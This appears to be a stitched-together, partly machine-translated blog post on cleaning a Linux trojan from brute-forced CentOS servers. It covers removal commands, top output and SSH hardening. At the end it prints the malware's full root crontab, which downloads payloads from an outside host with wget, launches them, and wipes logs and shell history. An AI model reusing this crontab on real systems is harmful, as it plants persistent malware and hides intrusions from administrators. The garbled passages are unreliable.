unknow processes dsfref, gfhddsfew, dsfref etc are starting automatically in centos 6.5
Virus mainly present in /etc/init.d/. Virus will run automatic on the time system start, so remove entry from /etc/init.d. These are virus and its locations
/etc/dsfref,
/etc/gfhddsfew
/etc/dsfref
To Remove Virus from linux
Note: I used chattr -i to change permissions and deleted the file sfewfesfs, when i tried to delete the file without using chattr, its says permissions cant be changed/file cant be deleted . and one more thing, when i used command #rm /etc/sfewfesfs without chattr , the computer restarted, it happened all the time i tried to delete the file without chattr. and these executables show up in running processes only when internt is connected.
Linux will be poisoned? Why is not this wonderful thing makes me met, and people really like me there, but fortunately there is, or is not depressed brother ~
situation is server access is very slow, can not access basic Gesanchaiwu! DNSpod Santianliangtou email me “D Monitoring notice: Your website inaccessible.”
Machine is CentOS, open port 22 root privileges, password length 9 all lowercase letters plus numbers erratic.
VPS service provider immediately to inquire about the situation, the feedback was informed of the results of the virus, was hacked
chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
chattr -i /etc/gfhjrtfyhuf*
rm -rf /etc/gfhjrtfyhuf*
chattr -i /etc/dsfrefr*
rm -rf /etc/dsfrefr*
chattr -i /etc/sdmfdsfhjfe*
rm -rf /etc/sdmfdsfhjfe*
chattr -i /etc/rewgtf3er4t*
rm -rf /etc/rewgtf3er4t*
chattr -i /etc/gfhddsfew*
rm -rf /etc/gfhddsfew*
chattr -i /etc/ferwfrre*
rm -rf /etc/ferwfrre*
Recently, I received a call from one of my client regarding the slowness(almost not responsive) of their linux server(running CentOS) and rapid increase in their network traffic. Fortunately this is one of the their lab servers and they did not incur any production outages.
Here is the output of the top command on this server:
top command – text
top screenshot
.
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1252 root 20 0 66.0g 2.9g 380 S 725.2 38.0 11935:13 .sshdd141199598
2025 root 20 0 423m 1760 0 S 3.2 0.0 0:39.98 gdmorpen
14295 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
14297 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
8316 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8318 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.47 .sshhdd14119186
8319 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.27 .sshhdd14119186
8321 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.11 .sshhdd14119186
8338 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.67 .sshhdd14119186
8339 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.67 .sshhdd14119186
8341 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8345 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.10 .sshhdd14119186
8360 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.59 .sshhdd14119186
8364 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.95 .sshhdd14119186
8371 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.94 .sshhdd14119186
8380 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.65 .sshhdd14119186
top
Here are the steps that I followed to remove this malware and hopefully this will helps others having the similar issue.
1. Disconnect the server from network.
2. Take the backup of root crontab and remove the root crontab. You can restore any relevant entries that you are aware of from the backup.
3. Remove the following files:
#rm /etc/gfhjrtfyhuf
#rm /etc/sfewfesfs
#rm /etc/gdmorpen
#rm /etc/fdsfsfvff
#rm /etc/rewgtf3er4t
#rm /etc/smarvtd
#rm /etc/whitptabil
#rm /etc/.SSH2
In case you are not able delete any of the above file, you might have to change the permissions and then remove the file:
#chattr -i /etc/sfewfesfs
#rm /etc/sfewfesfs
4. Remove the following files from /tmp directory:
#rm /tmp/gfhjrtfyhuf
#rm /tmp/sfewfesfs
#rm /tmp/gdmorpen
#rm /tmp/fdsfsfvff
#rm /tmp/rewgtf3er4t
#rm /tmp/smarvtd
#rm /tmp/whitptabil
#rm /tmp/.sshdd*
5. Remove file – S99local from /etc/rc
#rm /etc/rc2.d/S99local
#rm /etc/rc2.d/S99local
#rm /etc/rc3.d/S99local
#rm /etc/rc4.d/S99local
6. Disable remote root login:
open the file etc/ssh/sshd_config and comment change the following value to “no”:
# Prevent root logins:
PermitRootLogin no
6. Connect/enable network.
7. Update System:
#yum update
8. Now check the current running process and make sure that there are no strange process that are running.
Into the server and found that the machine stop contracting out, bandwidth filled (5 minutes can send 10G). 100% cpu usage, the name can be seen under the topsfewfesfs process there .sshddXXXXXXXXXXX (a string of random numbers) process. / Etc / down to see the name sfewfesfs, nhgbhhj and other strange names “red name” file.
22-port operation is also needed because the network service provider in the case not to force, only select the backup data reloading! Here the detoxification method of publicity, and then respondBrute force tactics are also summarized below:
If you are within the network users, modify the external network to map port 22 to XXXX, change the root password:
passwd
22 closed root privileges
found in the / etc / ssh / sshd_config file remove # PermitRootLogin changed
PermitRootLogin no
View occupied port
netstat -atunlp
See sfewfesfs and .sshdd1401029348 contracting process
View the process position
ll /proc/??PID
Delete virus files
chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
See suspicious file named nhgbhhj be deleted, etc.
rm -rf /etc/nhgbhhj
rm -rf /etc/nhgbhhj***
To delete a scheduled task ( very important ), the virus by the resurrection!
rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/root.1
.SSH2 See hidden files with ls -al, delete
rm -rf /etc/.SSH2
.sshdd1401029348 See hidden files with ls -al, delete
rm -rf /tmp/.sshdd140*
Restart the server to get.
Great God emphasize online: root privileges port 22 open or not, nozuonodie, for the first time experienced linux poisoning once thought it was a very secure operating system in -_- !, once it felt cool, careless.
Poisoning reason to remind
But the 22-port for VPS renter is to be opened, and the need to root account and privileges! Swollen what to do?
—- The following is important to emphasize in this article where —-
seemingly secure system is how the invasion of the pinch? The reason is that port 22 is open, with a simple root username + password, for example:
root123
Hackers use of brute force, is to use the “User Name” + “Password” exhaustive manner remote login, because Linux system default administrator username is root, just brute force password crackers, you can only nozuonodie the ~~
Recruit
Other trick it? Is to change the root user name 🙁 no specific order, you can only modify the configuration file)
root user login, vi modify / etc / passwd & / etc / shadow
(Not sure which of the two documents, please learn:/ Etc / passwd & / etc / shadow Comments )
vi /etc/passwd
Press the i key to enter edit mode
to modify the 1st row a root for a new user name
, press esc to exit edit mode, and enter: x save and exit
vi /etc/shadow
Press the i key to enter edit mode
to modify the 1st row a root for a new user name
, press esc to exit edit mode, and enter:! x forced to save and exit
NOTE: In order to properly use sudo, you need to modify / etc / sudoers settings, modify as follows (fromHow to add Users to / etc / sudoers ):
vi /etc/sudoers
Find the root ALL = (ALL) ALL
add the following line: a new username ALL = (ALL) ALL
: x forced to save and exit!
Reconnect, enter a new user name + the original root password! You’re done! !
Attached virus script
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo “unset MAILCHECK” >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
Recent Comments